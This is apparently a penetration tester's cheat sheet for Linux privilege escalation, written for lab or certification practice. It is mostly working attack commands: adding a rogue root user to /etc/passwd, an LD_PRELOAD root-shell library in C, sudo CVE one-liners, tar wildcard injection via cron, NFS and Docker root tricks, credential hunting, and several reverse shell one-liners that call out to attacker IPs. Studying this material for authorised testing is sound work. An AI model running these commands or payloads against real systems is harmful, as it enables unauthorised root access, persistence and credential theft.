Linux

This is a page dedicated to privilege escalation in unix based systems. Helpful hacktricks checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

Checklist2: https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#checklists

Tools

Always double check information from automated tools manually.

linPEAS.sh
LinEnum.sh
linuxprivchecker.py
unix-privesc-check
Mestaploit: multi/recon/local_exploit_suggester

Check directories manually

/opt, /tmp, /home # look for password files, logs, interesting .sh

System information

If any command does not work you can search for alternate ones in google.

hostname # get hostname
(cat /proc/version || uname -a ) 2>/dev/null # OS version, google for exploits
# you can get these information also from /etc/issue and /etc/*-release

lscpu # check architecture

ps aux # list processes
ps aux | grep root # list processes for given user

echo $PATH # check for write permission inside the path. Hijack binaries / libraries

find / -writable -type d 2>/dev/null # search for writeable directories

If the kernel is vulnerable here is the link containing some of the linux exploits: https://github.com/lucyoa/kernel-exploits

User information

Quick wins, find low handing fruits or basic knowledge about who are we.

history # check history for credentials / sensitive information
cat .bashrc
id # information about the group we are in
cat /etc/passwd # see users in the system
cat /etc/passwd | cut -d : -f 1 # list only users
cat /etc/shadow # check for sensitive files access
sudo su - # check if you can escalate to other user easily

You can leverage write permissions on /etc/passwd

openssl passwd w00t

echo "root2:<GENERATED_PASS>:root:/root:/bin/bash" >> /etc/passwd

su root2

Network enumeration

Maybe machine can be communicating with other network.

ip a # check network
ip route # check communication
arp -a # check communication
netstat -ano # check for internal open ports | example: 127.0.0.1:961, ! maybe the same port on internal behaves different than on external !
ss -anp # another way of checking for internal ports

SUDO/Capabilities

Quick way to elevate privileges. Search for programs using the commands listed during execution of the commands below and utilize the GTFO Bins web page: https://gtfobins.github.io

sudo -l # list commands that can be run as root
getcap -r / 2>/dev/null # list set capabilities (ep -> permit everything)
/usr/sbin/getcap -r / 2>/dev/null # oscp way

Pkexec is not listed in GTFO Bins but sometimes vulnerable to CVE-2021-4034.

More information about that can be found here: https://github.com/Almorabea/pkexec-exploit?trk=article-ssr-frontend-pulse_little-text-block

SUID

GTFO Bins

In order to get a quick win you can use the following command:

find / -perm -u=s -type f 2>/dev/null

And search for the commands in GTFO Bins to see if you can escalate with oneliner: https://gtfobins.github.io

Shared Object Injection

Look for somewhere where we can inject something.

find / -type f -perm -04000 -ls 2>/dev/null

When application is run look for: No such file or directory / open / access.

Then we can try to override it.

Trace what is happening and find what program tries to access.

strace /path/to/application_found 2>&1

Try to override it with malicious code. In order to do that you have to check privileges of given file:

ls -la /path/to/file_not_found.ext

Symlinks (vulnerable software on the server)

Search for files and applications (for example in user's home folder).

List packages with its version using dpkg to see if they are vulnerable.

dpkg -l # list everything
dpkg -l apache2 # in this example apache2

Suid on sudo + vulnerablr nginx from apache = shell.

Environmental Variables

TODO: rebuild this subsection (add function and path)

You can change PATH / environmental variable in order to execute malicious program created by us (for example reverse shell or just /bin/bash as root).

It is connected to SUID because the program that uses PATH or environmental variables has to be run as a root in order to do that.

env # show enviormental variables

export PATH=/tmp:$PATH # change path, in this case append /tmp to path as first var

Run the program after everything.

Log inspection

System logs can contain valuable information - it can be used to debugging some of our problems.

cat /var/log/ # look into the files in this folder

Search for strings in binaries

strings file | head # do this without head in order to see not only beggining of the file

Weak file permissions

If important file has weak permissions we can take advantage of it.

ls -la /etc/passwd # file with users

ls -la /etc/sysconfig/network-scripts/

If you have read/write permissions on /etc/shadow. You can get the hashes and crack them using hashcat and https://hashcat.net/wiki/doku.php?id=example_hashes in order to recognize the hashes.

ls -la /etc/shadow # file with passwords

You can also search for other files e.g. ssh-keys https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#sensitive-files

Intended funcionallity

When sudo is on intended functionality of the tool e.g. apache2 in order to perform our job. Sometimes with the right flag we can do some interesting this:

sudo apache2 -f /etc/shadow

The command above extract root hash.

Wget example: https://veteransec.com/2018/09/29/hack-the-box-sunday-walkthrough/

Of course this is a very specific case and depends on the configuration of the machine.

Escalation via LD_PRELOAD

If after sudo -l env_keep+=LD_PRELOAD shows up you are able to perform the exploit.

sudo -l

Prepare C file with the following code:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}

Compile the file with shell.c name:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Execute the file by loading it before other libraries:

sudo LD_PRELOAD=/home/user/shell.so [something we can run as root]

Daemons

System daemons are Linux services that are spawned at boot time to perform specific operations without any need for user interaction.

watch -n 1 "ps -aux | grep pass"

CVE 2019-14287

Vulnerable sudo version: sudo <1.8.28

When after sudo -l this shows up: hacker ALL=(ALL,!root) /bin/bash

If you will change the value of 1 to any other number you can take advantage of any other user.

sudo -u#-1 /bin/bash

CVE 2019-18634

Vulnerable sudo version: sudo <=1.8.30

If you are changing to the other user and see the * instead of nothing while writing the password it can be indicator that the system is vulnerable.

sudo -V # check for sudo version

Get file in C from here: https://github.com/saleemrashid/sudo-cve-2019-18634

Run exploit it in the system

./exploit

NO PASSWD File Replacement

sudo -l
rm file.sh
touch file.sh
nano file.sh

#!/bin/sh
bash

chmod +x file.sh
sudo ./file.sh

Password hunting

You can search for passwords, ssh-keys, secrets etc.

Resource to get more commands: https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#looting-for-passwords

history # check history
cat .bash_history # check history, do this in user home folder
grep --color-auto -rnw '/' -ie 'PASSWORD' --color=always 2> /dev/null # search for 'password' string in files
locate password | more # check for filenames which contains password string
find / -name authorized_keys 2> /dev/null # search filenames - ssh keys (alt: id_rsa)

Check root processes

https://github.com/DominicBreuker/pspy

./pspy64 # maybe credenials are leaked, interesting software is runned

Cron jobs

Depending on the permissions you can use alternative commands for cat /etc/crontab and crontab -l which are not listed here

Cron jobs are fired every x minutes / hours / days. If we can modify the program content of file or replace the file that is runned as root user we can get his shell.

cat /etc/crontab # get info about cron timings, programs and who runs them
ls -lah /etc/cron* # list scheduled tasks
crontab -l # list user's crontab 
pspy # detect a cron job
systemctl list-timers -all # list all systemctl timers (same thing as crontab)
grep "CRON" /var/log/syslog

Cron Path

See cron PATH variable in order to see where jobs are executed. Then you can use:

ls -la /path/from/path

To see what permissions do we have in this path. Also see if the file not exist, if we can modify it, replace it. Then wait...

.sh reverse shell oneliner

bash -i >& /dev/tcp/10.9.2.188/4444 0>&1

Cron Wildcards

If in the file there are wildcards used in commands we can do injection.

Prepare the file like this:

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > runme.sh

chmod +x

Then create in appropriate location the following files:

What does it do?

When program is using a wildcard it checks files at the folder location, instead reading a file name wildcard interprets filename as flag.

What do the checkpoints mean?

--checkpoint=1

Display number for every progress that you make.

--checkpoint-action=exec=sh\runme.sh

As you do the progress (hit the checkpoint) execute this: sh\runme.sh

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\runme.sh

If everything succeded this command should give us a root shell:

/tmp/bash -p

File override

Find the file that crontab use and check the permissions:

ls -la /path/with/file

If you have permissions to read and write you can delete this file and replace it with reverse shell which will give us a root shell.

Malicious file:

sh -i >& /dev/udp/10.0.0.1/4444 0>&1 # change IP to kali's IP

Listener on kali:

nc -nlvp 4444

OSCP reverse shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f" >> <file>.sh

NFS Root Squashing

If folder has no_root_squash the folder can be mounted with root permissions.

cat /etc/exports

Mount the folder on kali

showmount -e 10.10.10.10 # replace the victim's IP to show mounts

Create the folder

mkdir /tmp/mountme

mount -o rw,vers=2 10.10.10.10:/tmp /tmp/mountme # replace the victim's IP to mount the folder

Create a malicious file

echo 'int main() { setgid(0); setuid(0); system("bin/bash"); return 0; }' > /tmp/mountme/shell.c

gcc /tmp/mountme/shell.c -o /tmp/mountme/shell

chmod +s /tmp/mountme/shell

Now just execute the file and get root shell.

Docker

If we are in docker group we can use this in order to elevate privileges.

docker run -v /:/mnt --rm -it bash chroot /mnt sh

Drives

Find sensitive data on the drives (credntials, private keys)

ls /dev 2>/dev/null | grep -i "sd"
cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
#Check if credentials in fstab
grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null
lsblk # view all disks

Kernel modules

lsmod # list loaded kernel modules
/sbin/modinfo libata # get info about the specific module

Capture network traffic

sudo tcpdump -i lo -A | grep "pass"